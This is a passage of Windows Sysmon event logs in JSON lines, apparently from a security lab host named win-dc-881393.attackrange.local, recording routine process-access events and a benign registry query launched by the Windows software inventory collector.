C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-00109CD30400}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-00109CD30400}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01F2-5F25-0000-00109CD30400}\r\nSourceProcessId: 4996\r\nSourceThreadId: 5016\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-00101ED30400}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01F2-5F25-0000-00109CD30400}","SourceProcessId":"4996","SourceThreadId":"5016","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-00101ED30400}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2683,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.381\r\nProcessGuid: {A837DB8D-01F2-5F25-0000-001097D50400}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01F2-5F25-0000-00101ED30400}\r\nParentProcessId: 4988\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.381","ProcessGuid":"{A837DB8D-01F2-5F25-0000-001097D50400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01F2-5F25-0000-00101ED30400}","ParentProcessId":"4988","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2684,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01F2-5F25-0000-00101ED30400}\r\nSourceProcessId: 4988\r\nSourceThreadId: 4992\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-001097D50400}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\msvcrt.dll+4ba7c|C:\\Windows\\system32\\cmd.exe+103c4|C:\\Windows\\system32\\cmd.exe+10910|C:\\Windows\\system32\\cmd.exe+c36d|C:\\Windows\\system32\\cmd.exe+8ad9|C:\\Windows\\system32\\cmd.exe+6fdd|C:\\Windows\\system32\\cmd.exe+11a9e|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01F2-5F25-0000-00101ED30400}","SourceProcessId":"4988","SourceThreadId":"4992","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-001097D50400}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\msvcrt.dll+4ba7c|C:\\Windows\\system32\\cmd.exe+103c4|C:\\Windows\\system32\\cmd.exe+10910|C:\\Windows\\system32\\cmd.exe+c36d|C:\\Windows\\system32\\cmd.exe+8ad9|C:\\Windows\\system32\\cmd.exe+6fdd|C:\\Windows\\system32\\cmd.exe+11a9e|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-001097D50400}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-001097D50400}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2686,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2687,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2688,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 